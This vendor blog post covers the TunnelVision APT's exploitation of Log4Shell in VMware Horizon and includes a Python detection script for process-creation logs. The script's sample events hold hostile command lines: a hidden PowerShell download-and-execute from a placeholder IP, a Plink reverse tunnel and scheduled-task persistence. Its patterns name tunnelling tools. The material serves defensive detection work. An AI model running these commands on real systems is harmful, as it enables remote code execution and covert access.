TunnelVision APT Group Exploits the Log4j Vulnerability

WRITTEN BY
Alla Yurchenko
February 23, 2022 · 4 min read

One of the most notorious exploits of 2021 made its loud entrance into the cybersecurity world in December, and now Log4Shell is back on the radar: the Iran-linked TunnelVision APT has not let it rest in peace, exploiting the Log4j vulnerability in VMware Horizon alongside large-scale exploitation of Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell).

TunnelVision’s Activities Detection

According to current data, TunnelVision's ultimate objective is to deploy ransomware, taking advantage of unpatched VMware Horizon servers. Check out the Sigma rules that identify the threat actor's activities: they detect command lines used to maintain persistence, DLL sideloading, and other suspicious behaviors associated with the wide exploitation of 1-day vulnerabilities such as Fortinet FortiOS, ProxyShell, and Log4Shell.

TunnelVision Threat Actor Exploiting VMware Horizon via Log4j Vulnerability (via process creation)

Exploitation of the Log4j(CVE-2021-44228) vulnerability in VMware Horizon (via Scheduled Task Creation)

Prophet Spider with the exploitation of the Log4j(CVE-2021-44228) vulnerability in VMware Horizon (via cmdline)

Log4j RCE (CVE-2021-44228) Target in VMware Horizon via VMBlastSG Service

Log4j Exploit Hits Again Vulnerable VMWare Horizon Servers at Risk (via process_creation)

The rules are provided by our keen Threat Bounty developers Sittikorn Sangrattanapitak, Aytek Aytemur, Nattatorn Chuensangarun, and Emir Erdogan.

TunnelVision attackers are known to employ tunneling tools (hence the name), such as Fast Reverse Proxy Client (FRPC) and Plink, to evade detection and keep access to compromised hosts. In this environment, all security professionals are strongly recommended to share threat intelligence with the community and make use of the available indicators of compromise. It is also wise to seize the opportunity to take your defense and detection routine up a notch. To check the full list of detection content, visit the SOC Prime platform. Cybersecurity experts are more than welcome to join the Threat Bounty program to publish SOC content on the industry-leading platform and get rewarded for their valuable input.


TunnelVision APT Group Exploits

Security is only as strong as its weakest link. A few months ago, the Log4j library became a primary gateway for threat actors into victims' devices and networks. Since Log4Shell (CVE-2021-44228), also referred to as Log4j or LogJam, first surfaced in Apache Log4j in December 2021, companies worldwide have been grappling with severe cybersecurity concerns. Log4Shell stunned the digital security community with the severity of the incidents and how fast they mounted. The ease of exploiting the library bug enabled unauthenticated remote code execution leading to full system compromise. It attracted many adversaries and was massively exploited in the wild.

Today, TunnelVision is exploiting the Log4j vulnerability, Fortinet FortiOS, and Microsoft Exchange, with the Middle East and the USA as its primary target regions, SentinelOne researchers report. Analysis of the TTPs shows patterns characteristic of the Iranian state-backed groups Nemesis Kitten, Phosphorus, and Charming Kitten.

The exploitation of Log4j in VMware Horizon is marked by a malicious process spawned from the VMware product's Tomcat service. According to the researchers, the adversaries first exploit Log4j to execute PowerShell commands and then run PowerShell reverse shell commands via the Tomcat process. With PowerShell, the threat actors download tunneling tools such as Ngrok and go on to drop PowerShell backdoors. The first payload is a zip file containing an executable, InteropServices.exe; the second is a modified version of a PowerShell one-liner that has been widely used by state-sponsored hackers in previous campaigns.
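The detection pattern described above (a shell or PowerShell child of the Horizon Tomcat service, a download-and-execute one-liner, a scheduled task for persistence) and the tunneling tools mentioned earlier (FRPC, Plink, Ngrok) can be checked with a small process-creation triage script. The code below is an added example written for this article; it is not one of the Sigma rules from the Threat Bounty developers and not SentinelOne's code. It assumes Sysmon-style fields (ParentImage, Image, CommandLine), that Horizon's Tomcat runs as ws_TomcatService.exe and the Blast Secure Gateway as VMBlastSG.exe, and the sample events are constructed, not captured from a real incident.

```python
from __future__ import annotations
import re

# Assumed Horizon service binaries (not stated on the page) that host the
# Log4j-vulnerable components; any child process of these is worth a look.
HORIZON_PARENTS = {"ws_tomcatservice.exe", "vmblastsg.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TUNNEL_TOOLS = {"frpc.exe", "frps.exe", "plink.exe", "ngrok.exe"}

# Markers typical of download-and-execute or hidden/encoded PowerShell one-liners.
SUSPICIOUS_PS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"tcpclient|frombase64string|-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden",
    re.I,
)
# Command-line shapes of the tunneling tools, so a renamed binary is still caught:
# frpc -c <config>, plink by name, an ssh-style -R reverse forward, ngrok tcp/http.
TUNNEL_CMD = re.compile(
    r"\bfrpc?\b.*\s-c\s|\bplink\b|\s-R\s+\S+:\d+:\S+:\d+\b|\bngrok\b\s+(tcp|http)",
    re.I,
)
PERSIST_CMD = re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the list of detection names that fire for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits: list[str] = []
    if parent in HORIZON_PARENTS:
        # Horizon's Tomcat should not be spawning shells at all.
        hits.append("horizon_service_spawned_shell" if image in SHELLS
                    else "horizon_service_spawned_process")
    if image in {"powershell.exe", "pwsh.exe"} and SUSPICIOUS_PS.search(cmd):
        hits.append("suspicious_powershell")
    if image in TUNNEL_TOOLS or TUNNEL_CMD.search(cmd):
        hits.append("tunnelling_tool")
    if PERSIST_CMD.search(cmd):
        hits.append("scheduled_task_persistence")
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, detections) for every event that triggers at least one detection."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


# Constructed sample events (not real telemetry); paths are assumed Horizon defaults.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\Temp\svc.exe",  # renamed Plink: caught by its -R syntax
     "CommandLine": "svc.exe -R 0.0.0.0:3389:127.0.0.1:3389 user@203.0.113.5 -pw x -N"},
    {"ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c schtasks /create /tn Updater /tr C:\\Users\\Public\\u.ps1 /sc minute"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The parent-process check is the high-confidence signal: a Horizon installation has no legitimate reason for ws_TomcatService.exe to launch PowerShell or cmd.exe, so that rule can page on its own, while the command-line regexes are lower confidence and are best used to enrich or rank the alerts. Running the script over your own Sysmon Event ID 1 export (one JSON object per event) is the natural next step.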

TunnelVision is reported to have used a GitHub repository named "VmWareHorizon" to host the payloads throughout the operation.

Wrapping Up

APTs are an evolving and dangerous facet of the modern cyber threat landscape. The SOC Prime platform helps defend against tailored APT tooling faster and more efficiently. Test the content streaming capabilities of the CCM module and help your organization strengthen daily SOC operations with cyber threat intelligence. Keep your finger on the pulse of the fast-paced cybersecurity risk environment and get the best mitigation solutions with SOC Prime.
